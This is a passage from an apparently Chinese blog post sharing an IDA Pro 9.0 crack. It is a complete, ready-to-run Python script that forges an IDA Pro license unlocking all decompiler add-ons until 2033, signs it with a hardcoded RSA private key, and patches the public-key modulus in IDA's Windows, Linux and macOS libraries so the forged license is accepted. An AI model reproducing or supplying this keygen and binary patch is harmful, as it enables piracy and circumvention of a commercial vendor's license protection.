class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> json</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="comment"># originally made by alula</span></span><br><span class="line">license = &#123;</span><br><span class="line">    <span class="string">&quot;header&quot;</span>: &#123;<span class="string">&quot;version&quot;</span>: <span class="number">1</span>&#125;,</span><br><span class="line">    <span class="string">&quot;payload&quot;</span>: &#123;</span><br><span class="line">        <span class="string">&quot;name&quot;</span>: <span class="string">&quot;elf&quot;</span>,</span><br><span class="line">        <span class="string">&quot;email&quot;</span>: <span class="string">&quot;elv@ven&quot;</span>,</span><br><span class="line">        <span class="string">&quot;licenses&quot;</span>: [</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="string">&quot;description&quot;</span>: <span class="string">&quot;license&quot;</span>,</span><br><span class="line">                <span class="string">&quot;edition_id&quot;</span>: <span class="string">&quot;ida-pro&quot;</span>,</span><br><span class="line">                <span class="string">&quot;id&quot;</span>: <span class="string">&quot;48-2137-ACAB-99&quot;</span>,</span><br><span class="line">                <span class="string">&quot;license_type&quot;</span>: <span class="string">&quot;named&quot;</span>,</span><br><span class="line">                <span class="string">&quot;product&quot;</span>: <span class="string">&quot;IDA&quot;</span>,</span><br><span class="line">                <span class="string">&quot;seats&quot;</span>: <span class="number">1</span>,</span><br><span class="line">                <span class="string">&quot;start_date&quot;</span>: <span class="string">&quot;2024-08-10 00:00:00&quot;</span>,</span><br><span class="line">                <span class="string">&quot;end_date&quot;</span>: <span class="string">&quot;2033-12-31 23:59:59&quot;</span>,  <span class="comment"># This can&#x27;t be more than 10 years!</span></span><br><span class="line">                <span class="string">&quot;issued_on&quot;</span>: <span class="string">&quot;2024-08-10 00:00:00&quot;</span>,</span><br><span class="line">                <span class="string">&quot;owner&quot;</span>: <span class="string">&quot;&quot;</span>,</span><br><span class="line">                <span class="string">&quot;product_id&quot;</span>: <span class="string">&quot;IDAPRO&quot;</span>,</span><br><span class="line">                <span class="string">&quot;add_ons&quot;</span>: [</span><br><span class="line">                    <span class="comment"># &#123;</span></span><br><span class="line">                    <span class="comment">#     &quot;id&quot;: &quot;48-1337-DEAD-01&quot;,</span></span><br><span class="line">                    <span class="comment">#     &quot;code&quot;: &quot;HEXX86L&quot;,</span></span><br><span class="line">                    <span class="comment">#     &quot;owner&quot;: &quot;48-0000-0000-00&quot;,</span></span><br><span class="line">                    <span class="comment">#     &quot;start_date&quot;: &quot;2024-08-10 00:00:00&quot;,</span></span><br><span class="line">                    <span class="comment">#     &quot;end_date&quot;: &quot;2033-12-31 23:59:59&quot;,</span></span><br><span class="line">                    <span class="comment"># &#125;,</span></span><br><span class="line">                    <span class="comment"># &#123;</span></span><br><span class="line">                    <span class="comment">#     &quot;id&quot;: &quot;48-1337-DEAD-02&quot;,</span></span><br><span class="line">                    <span class="comment">#     &quot;code&quot;: &quot;HEXX64L&quot;,</span></span><br><span class="line">                    <span class="comment">#     &quot;owner&quot;: &quot;48-0000-0000-00&quot;,</span></span><br><span class="line">                    <span class="comment">#     &quot;start_date&quot;: &quot;2024-08-10 00:00:00&quot;,</span></span><br><span class="line">                    <span class="comment">#     &quot;end_date&quot;: &quot;2033-12-31 23:59:59&quot;,</span></span><br><span class="line">                    <span class="comment"># &#125;,</span></span><br><span class="line">                ],</span><br><span class="line">                <span class="string">&quot;features&quot;</span>: [],</span><br><span class="line">            &#125;</span><br><span class="line">        ],</span><br><span class="line">    &#125;,</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add_every_addon</span>(<span class="params">license</span>):</span><br><span class="line">    platforms = [</span><br><span class="line">        <span class="string">&quot;W&quot;</span>,  <span class="comment"># Windows</span></span><br><span class="line">        <span class="string">&quot;L&quot;</span>,  <span class="comment"># Linux</span></span><br><span class="line">        <span class="string">&quot;M&quot;</span>,  <span class="comment"># macOS</span></span><br><span class="line">    ]</span><br><span class="line">    addons = [</span><br><span class="line">        <span class="string">&quot;HEXX86&quot;</span>,</span><br><span class="line">        <span class="string">&quot;HEXX64&quot;</span>,</span><br><span class="line">        <span class="string">&quot;HEXARM&quot;</span>,</span><br><span class="line">        <span class="string">&quot;HEXARM64&quot;</span>,</span><br><span class="line">        <span class="string">&quot;HEXMIPS&quot;</span>,</span><br><span class="line">        <span class="string">&quot;HEXMIPS64&quot;</span>,</span><br><span class="line">        <span class="string">&quot;HEXPPC&quot;</span>,</span><br><span class="line">        <span class="string">&quot;HEXPPC64&quot;</span>,</span><br><span class="line">        <span class="string">&quot;HEXRV64&quot;</span>,</span><br><span class="line">        <span class="string">&quot;HEXARC&quot;</span>,</span><br><span class="line">        <span class="string">&quot;HEXARC64&quot;</span>,</span><br><span class="line">        <span class="comment"># Probably cloud?</span></span><br><span class="line">        <span class="comment"># &quot;HEXCX86&quot;,</span></span><br><span class="line">        <span class="comment"># &quot;HEXCX64&quot;,</span></span><br><span class="line">        <span class="comment"># &quot;HEXCARM&quot;,</span></span><br><span class="line">        <span class="comment"># &quot;HEXCARM64&quot;,</span></span><br><span class="line">        <span class="comment"># &quot;HEXCMIPS&quot;,</span></span><br><span class="line">        <span class="comment"># &quot;HEXCMIPS64&quot;,</span></span><br><span class="line">        <span class="comment"># &quot;HEXCPPC&quot;,</span></span><br><span class="line">        <span class="comment"># &quot;HEXCPPC64&quot;,</span></span><br><span class="line">        <span class="comment"># &quot;HEXCRV&quot;,</span></span><br><span class="line">        <span class="comment"># &quot;HEXCRV64&quot;,</span></span><br><span class="line">        <span class="comment"># &quot;HEXCARC&quot;,</span></span><br><span class="line">        <span class="comment"># &quot;HEXCARC64&quot;,</span></span><br><span class="line">    ]</span><br><span class="line"></span><br><span class="line">    i = <span class="number">0</span></span><br><span class="line">    <span class="keyword">for</span> addon <span class="keyword">in</span> addons:</span><br><span class="line">        i += <span class="number">1</span></span><br><span class="line">        license[<span class="string">&quot;payload&quot;</span>][<span class="string">&quot;licenses&quot;</span>][<span class="number">0</span>][<span class="string">&quot;add_ons&quot;</span>].append(</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="string">&quot;id&quot;</span>: <span class="string">f&quot;48-1337-DEAD-<span class="subst">&#123;i:02&#125;</span>&quot;</span>,</span><br><span class="line">                <span class="string">&quot;code&quot;</span>: addon,</span><br><span class="line">                <span class="string">&quot;owner&quot;</span>: license[<span class="string">&quot;payload&quot;</span>][<span class="string">&quot;licenses&quot;</span>][<span class="number">0</span>][<span class="string">&quot;id&quot;</span>],</span><br><span class="line">                <span class="string">&quot;start_date&quot;</span>: <span class="string">&quot;2024-08-10 00:00:00&quot;</span>,</span><br><span class="line">                <span class="string">&quot;end_date&quot;</span>: <span class="string">&quot;2033-12-31 23:59:59&quot;</span>,</span><br><span class="line">            &#125;</span><br><span class="line">        )</span><br><span class="line">    <span class="comment"># for addon in addons:</span></span><br><span class="line">    <span class="comment">#     for platform in platforms:</span></span><br><span class="line">    <span class="comment">#         i += 1</span></span><br><span class="line">    <span class="comment">#         license[&quot;payload&quot;][&quot;licenses&quot;][0][&quot;add_ons&quot;].append(</span></span><br><span class="line">    <span class="comment">#             &#123;</span></span><br><span class="line">    <span class="comment">#                 &quot;id&quot;: f&quot;48-1337-DEAD-&#123;i:02&#125;&quot;,</span></span><br><span class="line">    <span class="comment">#                 &quot;code&quot;: addon + platform,</span></span><br><span class="line">    <span class="comment">#                 &quot;owner&quot;: license[&quot;payload&quot;][&quot;licenses&quot;][0][&quot;id&quot;],</span></span><br><span class="line">    <span class="comment">#                 &quot;start_date&quot;: &quot;2024-08-10 00:00:00&quot;,</span></span><br><span class="line">    <span class="comment">#                 &quot;end_date&quot;: &quot;2033-12-31 23:59:59&quot;,</span></span><br><span class="line">    <span class="comment">#             &#125;</span></span><br><span class="line">    <span class="comment">#         )</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add_every_addon(license)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">json_stringify_alphabetical</span>(<span class="params">obj</span>):</span><br><span class="line">    <span class="keyword">return</span> json.dumps(obj, sort_keys=<span class="literal">True</span>, separators=(<span class="string">&quot;,&quot;</span>, <span class="string">&quot;:&quot;</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">buf_to_bigint</span>(<span class="params">buf</span>):</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">int</span>.from_bytes(buf, byteorder=<span class="string">&quot;little&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">bigint_to_buf</span>(<span class="params">i</span>):</span><br><span class="line">    <span class="keyword">return</span> i.to_bytes((i.bit_length() + <span class="number">7</span>) // <span class="number">8</span>, byteorder=<span class="string">&quot;little&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># Yup, you only have to patch 5c -&gt; cb in libida64.so</span></span><br><span class="line">pub_modulus_hexrays = buf_to_bigint(</span><br><span class="line">    <span class="built_in">bytes</span>.fromhex(</span><br><span class="line">        <span class="string">&quot;edfd425cf978546e8911225884436c57140525650bcf6ebfe80edbc5fb1de68f4c66c29cb22eb668788afcb0abbb718044584b810f8970cddf227385f75d5dddd91d4f18937a08aa83b28c49d12dc92e7505bb38809e91bd0fbd2f2e6ab1d2e33c0c55d5bddd478ee8bf845fcef3c82b9d2929ecb71f4d1b3db96e3a8e7aaf93&quot;</span></span><br><span class="line">    )</span><br><span class="line">)</span><br><span class="line">pub_modulus_patched = buf_to_bigint(</span><br><span class="line">    <span class="built_in">bytes</span>.fromhex(</span><br><span class="line">        <span class="string">&quot;edfd42cbf978546e8911225884436c57140525650bcf6ebfe80edbc5fb1de68f4c66c29cb22eb668788afcb0abbb718044584b810f8970cddf227385f75d5dddd91d4f18937a08aa83b28c49d12dc92e7505bb38809e91bd0fbd2f2e6ab1d2e33c0c55d5bddd478ee8bf845fcef3c82b9d2929ecb71f4d1b3db96e3a8e7aaf93&quot;</span></span><br><span class="line">    )</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">private_key = buf_to_bigint(</span><br><span class="line">    <span class="built_in">bytes</span>.fromhex(</span><br><span class="line">        <span class="string">&quot;77c86abbb7f3bb134436797b68ff47beb1a5457816608dbfb72641814dd464dd640d711d5732d3017a1c4e63d835822f00a4eab619a2c4791cf33f9f57f9c2ae4d9eed9981e79ac9b8f8a411f68f25b9f0c05d04d11e22a3a0d8d4672b56a61f1532282ff4e4e74759e832b70e98b9d102d07e9fb9ba8d15810b144970029874&quot;</span></span><br><span class="line">    )</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">decrypt</span>(<span class="params">message</span>):</span><br><span class="line">    decrypted = <span class="built_in">pow</span>(buf_to_bigint(message), exponent, pub_modulus_patched)</span><br><span class="line">    decrypted = bigint_to_buf(decrypted)</span><br><span class="line">    <span class="keyword">return</span> decrypted[::-<span class="number">1</span>]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">encrypt</span>(<span class="params">message</span>):</span><br><span class="line">    encrypted = <span class="built_in">pow</span>(buf_to_bigint(message[::-<span class="number">1</span>]), private_key, pub_modulus_patched)</span><br><span class="line">    encrypted = bigint_to_buf(encrypted)</span><br><span class="line">    <span class="keyword">return</span> encrypted</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">exponent = <span class="number">0x13</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">sign_hexlic</span>(<span class="params">payload: <span class="built_in">dict</span></span>) -&gt; <span class="built_in">str</span>:</span><br><span class="line">    data = &#123;<span class="string">&quot;payload&quot;</span>: payload&#125;</span><br><span class="line">    data_str = json_stringify_alphabetical(data)</span><br><span class="line"></span><br><span class="line">    buffer = <span class="built_in">bytearray</span>(<span class="number">128</span>)</span><br><span class="line">    <span class="comment"># first 33 bytes are random</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>):</span><br><span class="line">        buffer[i] = <span class="number">0x42</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># compute sha256 of the data</span></span><br><span class="line">    sha256 = hashlib.sha256()</span><br><span class="line">    sha256.update(data_str.encode())</span><br><span class="line">    digest = sha256.digest()</span><br><span class="line"></span><br><span class="line">    <span class="comment"># copy the sha256 digest to the buffer</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>):</span><br><span class="line">        buffer[<span class="number">33</span> + i] = digest[i]</span><br><span class="line"></span><br><span class="line">    <span class="comment"># encrypt the buffer</span></span><br><span class="line">    encrypted = encrypt(buffer)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> encrypted.<span class="built_in">hex</span>().upper()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">generate_patched_dll</span>(<span class="params">filename</span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> os.path.exists(filename):</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;Didn&#x27;t find <span class="subst">&#123;filename&#125;</span>, skipping patch generation&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(filename, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        data = f.read()</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> data.find(<span class="built_in">bytes</span>.fromhex(<span class="string">&quot;EDFD42CBF978&quot;</span>)) != -<span class="number">1</span>:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">f&quot;<span class="subst">&#123;filename&#125;</span> looks to be already patched :)&quot;</span>)</span><br><span class="line">            <span class="keyword">return</span></span><br><span class="line">      </span><br><span class="line">        <span class="keyword">if</span> data.find(<span class="built_in">bytes</span>.fromhex(<span class="string">&quot;EDFD425CF978&quot;</span>)) == -<span class="number">1</span>:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">f&quot;<span class="subst">&#123;filename&#125;</span> doesn&#x27;t contain the original modulus.&quot;</span>)</span><br><span class="line">            <span class="keyword">return</span></span><br><span class="line"></span><br><span class="line">        data = data.replace(</span><br><span class="line">            <span class="built_in">bytes</span>.fromhex(<span class="string">&quot;EDFD425CF978&quot;</span>), <span class="built_in">bytes</span>.fromhex(<span class="string">&quot;EDFD42CBF978&quot;</span>)</span><br><span class="line">        )</span><br><span class="line"></span><br><span class="line">        patched_filename = <span class="string">f&quot;<span class="subst">&#123;filename&#125;</span>.patched&quot;</span></span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(patched_filename, <span class="string">&quot;wb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">            f.write(data)</span><br><span class="line"></span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;Generated modulus patch to <span class="subst">&#123;patched_filename&#125;</span>! To apply the patch, replace the original file with the patched file&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># message = bytes.fromhex(license[&quot;signature&quot;])</span></span><br><span class="line"><span class="comment"># print(decrypt(message).hex())</span></span><br><span class="line"><span class="comment"># print(encrypt(decrypt(message)).hex())</span></span><br><span class="line"></span><br><span class="line">license[<span class="string">&quot;signature&quot;</span>] = sign_hexlic(license[<span class="string">&quot;payload&quot;</span>])</span><br><span class="line"></span><br><span class="line">serialized = json_stringify_alphabetical(license)</span><br><span class="line"></span><br><span class="line"><span class="comment"># write to ida.hexlic</span></span><br><span class="line">filename = <span class="string">&quot;idapro.hexlic&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(filename, <span class="string">&quot;w&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    f.write(serialized)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;Saved new license to <span class="subst">&#123;filename&#125;</span>!&quot;</span>)</span><br><span class="line"></span><br><span class="line">generate_patched_dll(<span class="string">&quot;ida32.dll&quot;</span>)</span><br><span class="line">generate_patched_dll(<span class="string">&quot;ida.dll&quot;</span>)</span><br><span class="line">generate_patched_dll(<span class="string">&quot;libida32.so&quot;</span>)</span><br><span class="line">generate_patched_dll(<span class="string">&quot;libida.so&quot;</span>)</span><br><span class="line">generate_patched_dll(<span class="string">&quot;libida32.dylib&quot;</span>)</span><br><span class="line">generate_patched_dll(<span class="string">&quot;libida.dylib&quot;</span>)</span><br></pre></td></tr></table></figure>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;IDA9-0-破解&quot;&gt;&lt;a href=&quot;#IDA9-0-破解&quot; class=&quot;headerlink&quot; title=&quot;IDA9.0 破解&quot;&gt;&lt;/a&gt;&lt;strong&gt;IDA9.0 破解&lt;/strong&gt;&lt;/h1&gt;&lt;div class=&quot;note orange icon</summary>
      
    
    
    
    <category term="资源分享" scheme="https://blog.2sec.io/categories/%E8%B5%84%E6%BA%90%E5%88%86%E4%BA%AB/"/>
    
    
    <category term="逆向破解" scheme="https://blog.2sec.io/tags/%E9%80%86%E5%90%91%E7%A0%B4%E8%A7%A3/"/>
    
    <category term="资源分享" scheme="https://blog.2sec.io/tags/%E8%B5%84%E6%BA%90%E5%88%86%E4%BA%AB/"/>
    
  </entry>
  
</feed>